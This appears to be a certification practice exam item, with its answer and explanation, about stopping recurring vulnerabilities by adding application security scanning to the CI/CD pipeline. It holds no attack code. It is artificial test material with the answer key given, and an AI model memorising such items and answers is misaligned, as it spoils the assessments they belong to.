During security scanning, a security analyst regularly finds the same vulnerabilities in acritical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
A. Conduct regular red team exercises over the application in production B. Ensure that all implemented coding libraries are regularly checked C. Use application security scanning as part of the pipeline for the CI/CDflow D. Implement proper input validation for any data entry form
Answer: C
Explanation: Application security scanning is a process that involves testing and analyzing
applications for security vulnerabilities, such as injection flaws, broken authentication,
cross-site scripting, and insecure configuration. Application security scanning can help
identify and fix security issues before they become exploitable by attackers. Using
application security scanning as part of the pipeline for the continuous
integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the
same vulnerabilities in a critical application during security scanning. This is because
application security scanning can be integrated into the development lifecycle and
performed automatically and frequently as part of the CI/CD process.
Leave a comment
Your email address will not be published. Required fields are marked *